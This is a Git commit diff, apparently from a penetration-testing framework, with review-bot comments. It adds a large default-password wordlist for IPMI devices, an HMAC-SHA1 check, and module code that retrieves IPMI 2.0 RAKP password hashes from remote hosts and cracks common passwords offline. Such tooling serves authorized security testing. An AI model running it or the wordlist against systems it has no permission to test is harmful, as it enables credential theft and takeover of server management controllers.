
Cleanup, reporting, and automatic cracking

This commit is contained in:
HD Moore 2013-06-23 01:35:31 -05:00
parent 5656e0cb7a
commit c869112407
3 changed files with 932 additions and 27 deletions


@ -0,0 +1,851 @@
ADMIN
PASSW0RD
calvin
admin
root
computer1
changeme
superuser
4rfv$RFV
password
123456
asdlkj
Letmein2
111111
Flamenco
1q2w3e4r
birdshit
237723
gandalf6
maria1988
angel2000
4rfvbhu8
bmw12345
letmein2
P@ssw0rd
12qw!@QW
12345678
monkeybutt
zero2hero
security
letmein1
Password1
calvin22
admin123
123456789
12345
p@ssw0rd
amilopro
adminadmin
albatros
freedumb1
face2face
aztech
antibiotico
1qaz2wsx
nopermission
imperial
Winston1
123qwe
odiotodo
get2it
evilpenguin
changemes
asdf1234
Administrator
siemens123
hpinvent
butt
brian0711
a12345678
1234
123
fresher
012012
administrator
Welcome123
Tokyo1
123qweASD
funshion
doris321
zaq1xsw2
test
letmein
kalimera
goethe
debugs
compaq
cisco
carpediem
blabla12
bios
apa123
abcd1234
Parasol1
23skidoo
!QAZ2wsx
ncc1701d
john2008
ipax
angusyoung
Nemesis1
Aloysius
zodiac666
soccer1
pandemonium
orpheus
netnet
lifeline
blabla
abc123
Welcome0
test123
sun12345
secure123
redhat
poepchinees
mackousko
level10
kuku
ilovetessa
f4g5h6j7
dropship
bobthebuilder
barbusse
aristoteles
apollo11
a13a13
RUPRECHT
P4ssw0rd
14111982
1234ABCD
progr3ss
cheng1234
winston
wibbles
toor
rootroot
root123
qwerty
qweQWE123
qazwsx123
q1w2e3r4
q1q1q1
prepaid
pokemon!
poi098
pepsi2008
parmesan
leoleo
junker
johnny50
hongkong
freedom
flapjack
cherokee
callofduty
bohemia
benitocameloo
babyface
augmentin
asdfhjkl
admin1234
abcdef3
Welcome1
P@$$w0rd
Hamster
Avalanche
1997
125401
123zxc123
123qweasdzxc
123qwe!@#
112233
04051995
q3kze7q
password201
m45t3rm1nd
jander1
blackonblack
1qaz@WSX
x
winston1
welcome1
vitesse
siempre!
shuriken
savanna
richard#1
parolamea
oceans11
nas123
megatron
liquidtension
linkin123
letmesee
l0v3m3
kane
k4hvdq9tj9
jack1998
itsasecret
inverter
happyhippo
hannover96
foo123
enter123321
enter123
dikdik
cisco123
changeme123
bigred23
asdewq
ardrossan
an0th3r
ZAQ!2wsx
Reptile1
Qwerty123
Password@1
Password123
Password#1
Pass1234
P@ssword
Haemorrhage
8253
2bornot2b
2718281828
22
1q2w3e4r5t
159357**
131313
123123
121212
11111111
111
10111011
topsecret
test1234
snickers
skywalker
secret
salamander
rutabaga
rotrot
rosedale
rollerblade
ringer
revision
razor
qwerty7
qwerty12
qwert
qazxswedc123
qazwsx
proba123
powerpower
powder1
poloppolop
plopplop
penelope
pathology
passw0rd
offshore
not4u2c
nopass
nitram
nerdnerd
mirrormirror
mi
mercedes
maxima
master
magex
loran123
lol
kingswood
keystone
kalvin
juliette
icecream
hobbs
hello123
he
grouper
gravity
gravis
gizmo
fubar
foobar
flying
flyboy
fernandes
fastweb
exploit
dweeble
dimdim
delta
cy
changeme1
catfish
carol
cardinal
calvin1
calliope
brother
blizzard
blahblah
bier
asd
aq12wsxz
apricot
apple
airlines
admini
access
abusive
abra
Windows1
Un1verse
ROOT
Qwerty1!
Password
PASSWORD
P@ssw0rd!
OEM
Letmein1
KNIGHT
Israel123
Christmas
Chester1
COMPAQ
CALVIN
963258
584620
225225
201036
2010
198624
146890
130590
123258
082208
012465
zzzz
ytrewq
xxxxxxxx
xxxxxx
xpsm1210
xerox
wombat
windows7
weblink
ventilator
valentino
totototo
toptop
tmp123
testtest
tester
test1
taki
system1
sysadmin
stanley
spike04
sofuck
sofresh
simonb
shin
setmefree
semmi
seekanddestroy
secure6
saynomore
sasman
samsun
salope
root4
ronson
roman123
riobravo
rikitiki
rayong1234
randy007
qwertz123
qwerty77
qwerty123
qwerty09
qwert12345
qweqweqwe
qweasd123
qwe123!@#
qwe123
qwas12
quepasa
qscwdv
qq123456
qazxsw2
qazwsx123456
qaz123
q1q2q3q4
q1q1q1q1
powermax
plokijuh
pizza42
pieceofshit
phoenix602
peter123
password55
password209
passw0rd1
passion12
pass123
pantera69
pa$$word
pa$$w0rd
p3t3rpan
opengate
ontology
omgomg123
number66
nova21
nike2008
n0d0ubt1
mvemjsunp
mustang70
munchkin10
mujama
muffinman
mikeiscool
megabit
mar1jane
mama1234
madman18
luke1993
ludacris
lord1234
lopata
lolipop2
lofasz
localadmin
letmeout
lenor
lemon123
langke
lalala
l8rsk8r
kusakusa
krakonos
km123456
kingofthehill
keepout123
karmal
karkulka
kakala
k123
ji394su3
jackson88
integra99
integra18
indonesiaraya
iamthebest
hyperdrive
huawei
howard03
hero777
helson
hashimoto
hasan12345
hanseatic
hallo123
hallo12
grapenuts
gorefest
goldstar
godblessyou
gfhjkm
getoutofhere
genius123
freetown1
freedom35
fotos1
florida69
fischer123
fire1818
figarofigaro
ficken2000
faszom
f18hornet
f00b4r
extazy
eragon1
easyway
easy123
duffy123
dropzone
dennis96
deneme
d3ft0n3s
d1ngd0ng
d0dger
d00rmat
csigabiga
crew10
credu
crashbandicoot
consults
collins123
ciscocisco
ciang
chile62
check123
ch4ng3m3
catinthehat
carla123
calvin99
calvin!
calv1n
calamar
bubububu
bluespot
blubje
black321
bla123
bigbuddy
banane1
asdasd
asdQWE123
asd123qwe
anakonda
alpargata
alarcon
adoado
abrakadabra
abcd-1234
abc123!!
abc#123
a1b2c3d4e5f6
a1b2c3d4e5
a123456
a11b12c13
Zaq1xsw2
Und3rGr0und
TrustNo1
Test1234
Super123
Summer12
Silicon1
Runaway1
Republic1
Qwer!234
P@ssword123
P@55w0rd
P@$$word
P@$$w0rD
Operator
Newpass1
MKO)9ijn
Lasvegas1
Insecure
Impatiens
INTERNAT
Boromir1
Berman
Asdfg123
Asd123
@WSX1qaz
88888888
874365
832531
735841
666001
570912
56565656
545981
43046721
3stones
38483848
311147
2brnot2b
29082908
2468369
23041979
22242224
222101
22071979
21101981
20742074
2071184
20572057
20552055
20132013
20112011
1q2w3e
1a2s3d4f
19511951
19501950
19491949
187cop
17841784
17201720
17161716
159753456
147896325
146688
1456
12qwaszx
12qw34er
123qwerty
123mudar
1234qwer!
1234Qwer
1234567890qwertyuiop
123454321
123412345
123.com
12201220
12121212
11112222
1020304050
10144
10143
10135
10118
10101010
0okmnji9
06061977
!Q2w#E4r
zse4rfv
zmalqp10
zazazaza
zaxscdvf
zaqwsxcde
zaq1@WSX
yyl
yuiop
yellow22
yellow123
yakiniku
yabadabadoo
xitgmLwmp
xdr56tfc
whitebird
west123
wave123
wachtwoord
w8w00rd
w00tw00t
vlis
vivivi
vitaly
virginia11
vince123
viewmaster
vatten
vatefairefoutre
united99
united123
triangulation
tj1234
titkos
tiger123
throwaway
three4me
testbed
temppass
temp1234
temp11
telefone
tarantula1
tagada
sysu
system32
strasburg
start123
skysky21
shakyamuni
sclg
sanayounes
samsung34
sallasana
s3cur3d
round123
root1234
reformation
redpoint
redorblue
raritan
rais
qwerty1234567890
qwerqaz
qweewq123
qweasdzxc2
qweasd789
qwe123.
qazzxc
qazwsx!@#
qazw1234
qaz74123
pswrdpswrd
primat
portakal1
picus
phishfood
petert999
patrickb123
password1`
omfglol1
nottelling
nobchan
new_password
netadmin
net101
nemtom1
n0ttelling
mwmwmw
mumuland
mexx6399
mcknight88
masterok
mainstreet
maine207
m1r4nd4
m0t0rhead
lkilogmL
linux99
lbyjpfdh
labas123
kukareku
krumholz
kolobezka
kenzan
kcm
kali2002
kalap
k1rs1kka
juke2008
jtjd
jiemou3i
jbvm
hogehoge
haslo123
harley1985
gowest!
gomachan
gigi99
ghbdtnbr
gfhjkmrf
gbpltw
g8keeper
fuckbitchesgetmoney
formeforme
flat24
flaquito6
f00sball
f00bar
ezit
dream182
delled0
darwin99
daemon09
d0m1n0
cukorborso
cti4ever
cpe1704tks
compaq2003
cisko
changeme20
cdwv
cdn123
cbtp
cairell
cabajka
c@lvin
burek123
bublik
bomba
barbetta
baofeng
b4lls4ck
athlon64
aspirine
asdlkj123
asdlkj12
aqua2000
aqq123
apstndp
anyadhogyvan
anakonda1
akula123
adminpass
admin01
admin001
accobra
abhaile1
abcdpass
abc123d4
abang78
a1rplan3
Zxasqw12
What3v3r
Varadero
TheLast1
Tamara01
T4urus
SunnyJim7
Suckit1
Runner11
R3volution
Qwe12345
QAWSEDRF
Q!W@E#R$
Polar123
Passw0rd1111
PassW0rd
Pa22w0rd
P@$$W0RD
M1cha3l
M
LonDon
Kia123
Joel1234
IPMI
George123
Crocodile1
Chocolate19
Aurora01
Admin@123
Admin123
9ijn7ygv
9641
788111
749174
6922374
643558
4rfv%TGB
493749
3l3ctr1c
343guiltyspark
2keeper
24041975
23712371
23051979
21121477
20682068
20562056
1qazxsw2
1qazxcvb
1qaz2wsx3edc
1qaz0okm
1qaz!QAZ
1q2w3e4r5t6y
1q2w3e4r..
1keeper
1340hd
123cztery
1234qwer`
12345678abc
123132123
116572
00850085
*password
!Q2w3e4r


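--- a/PATH_NOT_SHOWN
+++ b/PATH_NOT_SHOWN
@@ -81,6 +81,10 @@ class Utils
 username
 end
+def self.verify_rakp_hmac_sha1(salt, hash, password)
+OpenSSL::HMAC.digest('sha1', password, salt) == hash
+end
 end
 end
 end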
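Review bot: verify_rakp_hmac_sha1 has no documentation, and its parameter names hide that both `salt` and `hash` must be raw binary strings: the module in this same commit passes `hmac_buffer` and `rakp.hmac_sha1` straight in and only hex-encodes them with `unpack("H*")` for display, so a caller that hands in the hex form from an OUTPUT_FILE line would always get false. A header comment would pin the contract: `# True when HMAC-SHA1 keyed with password over salt (the captured RAKP data) equals hash; salt and hash are raw bytes, not hex strings.` The method also depends on OpenSSL being loaded; if this file does not already require it, that should be added here rather than relied on from whichever module happens to call it.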


@ -17,7 +17,12 @@ class Metasploit3 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'IPMI 2.0 RAKP Remote Password Hash Retreival', 'Name' => 'IPMI 2.0 RAKP Remote Password Hash Retreival',
'Description' => 'Identify valid usernames and their hashed passwords through the IPMI 2.0 RAKP protocol', 'Description' => %q|
This module identifies IPMI 2.0 compatible systems and attempts to retrieve the
HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb
in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
|,
'Author' => [ 'Dan Farmer <zen[at]fish2.com>', 'hdm' ], 'Author' => [ 'Dan Farmer <zen[at]fish2.com>', 'hdm' ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
@ -33,7 +38,11 @@ class Metasploit3 < Msf::Auxiliary
OptPath.new('USER_FILE', [ true, "File containing usernames, one per line", OptPath.new('USER_FILE', [ true, "File containing usernames, one per line",
File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_users.txt') File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_users.txt')
]), ]),
OptString.new('OUTPUT_FILE', [false, "File to save captured password hashes into"]) OptPath.new('PASS_FILE', [ true, "File containing common passwords for offline cracking, one per line",
File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_passwords.txt')
]),
OptString.new('OUTPUT_FILE', [false, "File to save captured password hashes into"]),
OptBool.new('CRACK_COMMON', [true, "Automatically crack common passwords as they are obtained", true])
], self.class) ], self.class)
end end
@ -109,12 +118,13 @@ class Metasploit3 < Msf::Auxiliary
end end
if rakp.error_code != 0 if rakp.error_code != 0
vprint_status("#{rhost} Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}") vprint_error("#{rhost} Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}")
next next
end end
# TODO: Finish documenting this error field
if rakp.ignored1 != 0 if rakp.ignored1 != 0
vprint_status("#{rhost} Returned weird error code #{rakp.ignored1} for username #{username}") vprint_error("#{rhost} Returned error code #{rakp.ignored1} for username #{username}")
next next
end end
@ -129,37 +139,78 @@ class Metasploit3 < Msf::Auxiliary
username username
) )
found = "#{rhost} #{username}:#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}" found = "#{rhost} Hash #{username}:#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}"
print_good(found) print_good(found)
# Write the rakp hash to the output file
if @output if @output
@output.write(found + "\n") @output.write(found + "\n")
end end
# Write the rakp hash to the database
report_auth_info(
:host => rhost,
:port => rport,
:proto => 'udp',
:sname => 'ipmi',
:user => username,
:pass => "#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}",
:source_type => "captured",
:active => true,
:type => 'rakp_hmac_sha1_hash'
)
# Offline crack common passwords and report clear-text credentials
next unless datastore['CRACK_COMMON']
::File.open(datastore['PASS_FILE'], "rb") do |pfd|
passwords = pfd.read(pfd.stat.size).split("\n")
passwords << ""
passwords.uniq.each do |pass|
pass = pass.strip
next unless pass.length > 0
next unless Rex::Proto::IPMI::Utils.verify_rakp_hmac_sha1(hmac_buffer, rakp.hmac_sha1, pass)
print_good("#{rhost} Hash for user '#{username}' matches password '#{pass}'")
# Report the clear-text credential to the database
report_auth_info(
:host => rhost,
:port => rport,
:proto => 'udp',
:sname => 'ipmi',
:user => username,
:pass => pass,
:source_type => "cracked",
:active => true,
:type => 'password'
)
break
end
end
end end
end end
def process_getchannel_reply(data, shost, sport) def process_getchannel_reply(data, shost, sport)
shost = shost.sub(/^::ffff:/, '') shost = shost.sub(/^::ffff:/, '')
info = Rex::Proto::IPMI::Channel_Auth_Reply.new(data) rescue nil info = Rex::Proto::IPMI::Channel_Auth_Reply.new(data) rescue nil
# Ignore invalid responses # Ignore invalid responses
return if not info return if not info
return if not info.ipmi_command == 56 return if not info.ipmi_command == 56
banner = info.to_banner banner = info.to_banner
print_status("#{shost}:#{datastore['RPORT']} #{banner}") print_status("#{shost} #{banner}")
report_service( report_service(
:host => shost, :host => rhost,
:port => datastore['RPORT'], :port => rport,
:proto => 'udp', :proto => 'udp',
:name => 'ipmi', :name => 'ipmi',
:info => banner :info => banner
) )
# TODO:
# Report a vulnerablity if info.ipmi_user_anonymous has been set # Report a vulnerablity if info.ipmi_user_anonymous has been set
# Report a vulnerability if ipmi 2.0 and kg is set to default # Report a vulnerability if ipmi 2.0 and kg is set to default
# Report a vulnerability if info.ipmi_user_null has been set (null username) # Report a vulnerability if info.ipmi_user_null has been set (null username)
@ -183,9 +234,22 @@ class Metasploit3 < Msf::Auxiliary
info info
end end
def setup
super
@output = nil
if datastore['OUTPUT_FILE']
@output = ::File.open(datastore['OUTPUT_FILE'], "ab")
end
end
def cleanup
super
@output.close if @output
@output = nil
end
# #
# Helper methods (this didn't quite fit with existing mixins) # Helper methods (these didn't quite fit with existing mixins)
# #
attr_accessor :udp_sock attr_accessor :udp_sock
@ -204,20 +268,6 @@ class Metasploit3 < Msf::Auxiliary
r[1] ? r : nil r[1] ? r : nil
end end
def setup
super
@output = nil
if datastore['OUTPUT_FILE']
@output = ::File.open(datastore['OUTPUT_FILE'], "ab")
end
end
def cleanup
super
@output.close if @output
@output = nil
end
def rhost def rhost
datastore['RHOST'] datastore['RHOST']
end end
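Review bot: In the CRACK_COMMON block of the @@ -129,37 +139,78 @@ hunk (inside a handler whose definition starts before the hunk) the `passwords << ""` entry is dead code: every candidate passes through `pass = pass.strip` and `next unless pass.length > 0`, so the empty password the author deliberately appended is never tested, while `uniq` runs before `strip` and leaves whitespace variants to be hashed twice. Normalising first and appending the empty candidate afterwards preserves the intent: `passwords = pfd.read(pfd.stat.size).split("\n").map(&:strip).reject(&:empty?).uniq`, then `passwords << ""`, then `passwords.each do |pass|` going straight to the `verify_rakp_hmac_sha1` check. The wordlist is also re-read from disk for every hash captured, because the `::File.open(datastore['PASS_FILE'], "rb")` sits inside the per-username loop; it looks like it could be loaded once in the new `setup` next to `@output`, though that depends on code outside the hunk.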